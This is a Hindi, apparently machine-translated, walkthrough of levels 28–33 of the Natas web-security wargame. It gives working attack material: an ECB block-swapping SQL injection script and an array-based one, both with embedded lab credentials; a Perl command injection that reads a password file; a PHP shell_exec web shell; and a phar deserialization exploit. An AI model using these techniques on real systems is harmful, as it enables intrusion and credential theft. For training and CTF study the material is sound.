नेटस वेब। वेब भेद्यता का फायदा उठाने के उद्देश्य से CTF मंच का मार्ग। भाग 5

इस लेख में, हम नाट्स वारगेम उदाहरण का उपयोग करते हुए कुछ WEB- पहचान के संचालन से निपटेंगे। प्रत्येक स्तर पर अगले स्तर के पासवर्ड तक पहुंच है। सभी पासवर्ड / etc / natas_webpass / files में भी संग्रहीत हैं। उदाहरण के लिए, natas5 का पासवर्ड फ़ाइल / etc / natas_webpass / natas5 में संग्रहीत है और केवल natas4 और natas5 उपयोगकर्ताओं के लिए पढ़ा जाता है।

पिछले भाग: भाग 1 , भाग 2 , भाग 3 और भाग 4

स्तर 28

किसी भी अनुरोध को भेजने पर, हम एक अन्य पृष्ठ पर एक अजीब अनुरोध और आधार 64 एन्कोडिंग के साथ रीडायरेक्ट देखते हैं, जिसका डिकोडिंग कुछ भी नहीं देता है।



हम क्वेरी के लिए कोई भी अनुरोध भेजेंगे। हमें एक त्रुटि मिलती है जो यह स्पष्ट करती है कि पुनर्निर्देशन एन्क्रिप्शन का उपयोग करता है और इस पृष्ठ पर डेटाबेस को स्थानांतरित करने से पहले अनुरोध को डिक्रिप्ट किया जाता है। यही है, हमें अपने इंजेक्शन को एन्क्रिप्ट करने और इसे सर्वर पर भेजने की आवश्यकता है, लेकिन हम कुंजी को नहीं जानते हैं। लेकिन हमारे पास एक एनक्रिप्ट है - यह सर्वर है।



सबसे पहले, एन्क्रिप्शन के साथ सौदा करते हैं। हम दो अलग-अलग पंक्तियाँ "क्वर्टी" और "एशफैड" भेजेंगे और विश्लेषण करेंगे कि उन्हें कैसे परिवर्तित किया जाएगा।



जवाब में, हमें समान रेखाएं मिलती हैं, जो एक निश्चित स्थान पर एक विशिष्ट अनुक्रम होती हैं। चूंकि दो पीसी (सिफर टेक्स्ट) की शुरुआत और अंत एक ही है, हम निम्नलिखित निष्कर्ष निकाल सकते हैं:

• ओटी के लिए प्रारंभिक पूरक का उपयोग किया जाता है (प्लेटेक्स्ट);
• ओटी के लिए एक अंतिम अतिरिक्त है;
• ईसीबी मोड का उपयोग किया जाता है, क्योंकि विभिन्न ओटी में सीटी के अंतिम ब्लॉक समान होते हैं, यानी ब्लॉक एक दूसरे से स्वतंत्र होते हैं।

विचार यह है: हम एन्क्रिप्शन के लिए डेटाबेस को एक क्वेरी भेजते हैं, लेकिन इसे परिवर्तित किया जाएगा और इसलिए, जब डिक्रिप्टिंग होती है, तो इंजेक्शन पास नहीं होगा। ऐड-ऑन के साथ उन ब्लॉकों की सही गणना करना आवश्यक है जहां हमारे पेलोड को एन्क्रिप्ट किया जाएगा। फिर एन्क्रिप्शन के बाद, हम अपने ब्लॉक को अनुरोध से ले लेंगे और उन्हें केवल सर्वर पर भेज देंगे। सर्वर पर उन्हें डिक्रिप्ट किया जाएगा और, चूंकि वे ऐड-ऑन के बिना हैं, निष्पादित होते हैं।

विचार चार छवियों में प्रस्तुत किया गया है:

1. 5 ब्लॉक की प्रस्तुति
2. प्रारंभ और अंत परिवर्धन के साथ एक एनकोडर जो एक रिक्त स्ट्रिंग को एन्क्रिप्ट करता है।
3. स्ट्रिंग का एन्क्रिप्शन "TEXTTEXTTEXTTEXT"।
4. अपनी लाइन को अलग ब्लॉक में रखने से पहले और बाद में आवश्यक संख्याओं को जोड़कर हम परिवर्धन से छुटकारा पा लेते हैं। हम पीसी से केवल दूसरे ब्लॉक लेते हैं।

इस तरह, हमें केवल एक अज्ञात कुंजी पर हमारी एन्क्रिप्टेड स्ट्रिंग प्राप्त हुई !!!

डेटा की आवश्यकता:

1. एन्क्रिप्शन मोड (ज्ञात - ईसीबी)
2. ब्लॉक लंबाई (ज्ञात - 16)
3. प्रारंभिक ऐड-ऑन लंबाई (अज्ञात)
4. हमारे पाठ की लंबाई (ज्ञात - "पासवर्ड चुनें"
   उपयोगकर्ताओं से मजाक के रूप में ")

प्रारंभिक भरने की लंबाई का पता लगाना आवश्यक है। चूंकि पहले दो ब्लॉक समान हैं, इसलिए हम अलग-अलग संख्या में वर्ण भेजेंगे, और जैसे ही तीसरा ब्लॉक बदलना बंद होगा, हम इसे पूरक करने के लिए आवश्यक वर्णों की संख्या पाएंगे। ये 10 अक्षर हैं। नीचे उपरोक्त एल्गोरिथ्म का कार्यान्वयन है।

import base64 import requests from urlparse import urlsplit from urllib2 import unquote def ChiperQuery(url, auth, query): resp = requests.post(url, auth=auth, data={'query': query}) query_param = unquote(urlsplit(resp.url)[3][6:]) byte_decode_query = bytearray(base64.b64decode(query_param)) return byte_decode_query def SendPayload(url, auth, payload): enc_payload = base64.b64encode(bytes(payload)) ret = requests.get(url + '/search.php', auth=auth, params={'query': enc_payload}) return ret.text url = "http://natas28.natas.labs.overthewire.org/" auth = requests.auth.HTTPBasicAuth("natas28", "JWwR438wkgTsNKBbcJoowyysdM82YjeF") query = "SELECT password AS joke FROM users" query += " " * (16-len(query)%16) plaintext = 'b'*10 + query + chr(16)*16 chip_query = ChiperQuery(url, auth, plaintext) st_pos = len(query) count = st_pos+16 result = SendPayload(url, auth, chip_query[st_pos:st_pos+count]) print(result) 

हमें पासवर्ड मिलता है।

स्तर 29

यह अनुमान लगाना मुश्किल है कि पर्ल कोड कमांड लाइन फ़ंक्शन को कॉल करता है और कमांड को डेटा फ़ाइल (जिसे आप चुन सकते हैं) में कमांड को पास करता है। तथ्य यह है कि हम पाइपलाइन को "निष्पादन" से बंद कर सकते हैं read_command_file "में" निष्पादन | read_command | our_smd_command। "



लेकिन तथ्य यह है कि हमारी टीम कंसोल पर प्रदर्शित होगी, न कि साइट पर। ऐसा करने के लिए, इनपुट / आउटपुट स्ट्रीम में वर्णों को बदलने के लिए निम्न कमांड जोड़ें: “| tr `से पहले` के बाद`।



चूंकि कमांड पूरा हो गया है, हम निर्दिष्ट फ़ाइल से पासवर्ड पढ़ेंगे। लेकिन हमें बताया जाता है कि हम ऐसा नहीं कर सकते ...



हम कमांड लाइन फ़िल्टरिंग का उपयोग करेंगे और किसी भी स्थान पर उद्धरण चिह्नों को सम्मिलित करेंगे जो कमांड निष्पादित होने पर मिट जाएंगे।



हम पासवर्ड निकाल लेते हैं।

स्तर 30

स्रोत कोड देखें। यहां उद्धरण () पद्धति का उपयोग किया जाता है, जो एक स्ट्रिंग में सभी विशेष वर्णों से बच जाता है। लेकिन यह वास्तव में स्ट्रिंग में बच जाता है, जो हमें इंजेक्शन संचालित करने का अधिकार देता है, यदि हम उपयोग करते हैं, उदाहरण के लिए, एक सरणी (इस मामले में, एक शून्य तत्व स्वीकार किया जाएगा)।



चलो अनुरोध के लिए एक लोड के साथ आते हैं

 Select * FROM users where username = 'username' and password = 'password'; 

चूंकि हम जानते हैं कि उपयोगकर्ता नाम natas31 है, हम पासवर्ड में सही स्थिति का परिचय देते हैं: '' या 1. तब हमारा अनुरोध इस तरह हो जाएगा

 Select * FROM users where username = 'natas31' and password = '' or 1; 

और अब यह एक सरणी भेजने के लिए बनी हुई है।

 import requests url = "http://natas30.natas.labs.overthewire.org/index.pl" s = requests.Session() s.auth = ('natas30', 'wie9iexae0Daihohv8vuu3cei9wahf0e') args = { "username": "natas31", "password": ["'' or 1", 2] } r = s.post(url, data=args) print(r.text) 

हम पासवर्ड निकाल लेते हैं।

स्तर 31

सेवा का सार तुरंत स्पष्ट हो जाता है: सीएसवी फ़ाइल से हमें HTML में तालिका मिलती है।



स्रोत कोड देखते हैं।



और इसलिए, क्या सबसे दिलचस्प है: यह समय रेखा (<$ फ़ाइल>) है, जबकि फ़ाइल पैरामीटर से रेखा है। इस प्रकार, कोड को निष्पादित करना संभव है।



किसी भी सीएसवी फ़ाइल को भेजें और बर्प सूट में अनुरोध को रोकें।



अब कमांड को एक पैरामीटर के रूप में जोड़ते हैं।

 ?/bin/cat%20/etc/natas_webpass/natas32%20| 

पैरामीटर से लोड को कॉल करने के लिए, निम्नलिखित लाइनें जोड़ें:

 -----------------------------716973545450730846281908502 Content-Disposition: form-data; name="file"; Content-Type: text/csv ARGV 

हमें पासवर्ड मिलता है।

स्तर 32

हम उस पृष्ठ को खोलते हैं जहां हमें बताया जाता है कि हमें कोड के निष्पादन को साबित करने और वेबरोट फ़ाइल को निष्पादित करने की आवश्यकता है।



यदि आप कोड को देखते हैं, तो यह पिछले स्तर की तरह ही है। फिर हम पिछली बार की तरह भेद्यता का फायदा उठाते हैं। चलो वेबरोट फ़ाइल ढूंढते हैं। ऐसा करने के लिए, एक लोड के रूप में उपयोग करके निर्देशिका को देखें: ls -la |



फ़ाइलों की सूची प्राप्त करें। वेबरोट नहीं है, लेकिन एक अजीब प्रोग्राम गेटपास है।
हम इसे बाहर ले जाते हैं।





हमें अंतिम स्तर के लिए पासवर्ड मिलता है।

स्तर 33

फिर से फाइल अपलोड फॉर्म।



स्रोत कोड देखें।



इस प्रकार, हमें सर्वर में 4 एमबी तक की फ़ाइल अपलोड करनी चाहिए और यदि फ़ाइल की सामग्री का md5 संदर्भ मान के बराबर है, तो इसे php दुभाषिया में निष्पादित किया जाएगा। हम आगे देखते हैं। हम फ़ाइल नाम और उसकी सामग्री को नियंत्रित कर सकते हैं।



मैं तुरंत कहूंगा कि यह एक जटिल भेद्यता है जो मुझे आधे साल पहले मिली थी। यह इस उद्देश्य से है कि हम सर्वर पर किसी भी प्रकार की फ़ाइल अपलोड कर सकते हैं और इसकी सामग्री के साथ कोई भी संचालन किया जाएगा। फ़ार फ़ाइलों के बारे में यहाँ लिखा गया है । संक्षेप में, क्रमबद्ध डेटा का प्रतिनिधित्व करने वाला एक विशेष php आर्काइव। इस स्थिति में, फ़ैर स्ट्रीम पढ़ने से कोड का निष्पादन होगा। इस प्रकार, आप कोड को क्रमबद्ध कर सकते हैं और इसे सर्वर पर भेज सकते हैं। Md5 की गणना करते समय, एक धारा पढ़ी जाएगी - जिससे कोड निष्पादन होगा।

इसलिए सबसे पहले एक php फाइल बनाएं जिसमें झंडा लिखा हो।

 <?php echo shell_exec('cat /etc/natas_webpass/natas34'); ?> 

इसे सर्वर पर अपलोड करें। बर्प सूट में नाम बदलना न भूलें।





हमें सर्वर की प्रतिक्रिया मिलती है ... ठीक है। अब एक फ़ार आर्काइव बनाएं, जिसे निष्पादित करते समय हमें उन मूल्यों को बदलना होगा जिनकी हमें ज़रूरत है (हैश हमेशा सही होगा और फ़ाइल का नाम जो पहले से ही सर्वर पर अपलोड किया गया है)। तो हम चेक को पास करेंगे और सर्वर शेल.एफपी निष्पादित करेगा।

 <?php class Shell { private $filename = "shell.php"; private $signature = True; private $init = false; } $phar = new Phar("shell.phar"); $phar->startBuffering(); $phar->addFromString("123.txt", '123'); $phar->setStub("<?php __HALT_COMPILER(); ?>"); $s = new Shell(); $phar->setMetadata($s); $phar->stopBuffering(); ?> 

/Etc/php/xx/php.ini फ़ाइल में संकलित करने से पहले, आपको phar.readonly पैरामीटर को ऑफ़ में बदलना होगा।



इसके बाद, php shell.php निष्पादित करें और हमें .phar फ़ाइल मिलती है। हम इसे सर्वर पर भेजते हैं और नाम बदलते हैं।



इसलिए हमारे पास दोनों फाइलें हैं: संग्रह और शेल। अब आपको संग्रह से फ़ाइल को पढ़ने की आवश्यकता है, जिससे कोड निष्पादन हो जाएगा।



हमें पासवर्ड मिलता है।



वह नाटा स्थल था। आप टेलीग्राम पर हमसे जुड़ सकते हैं।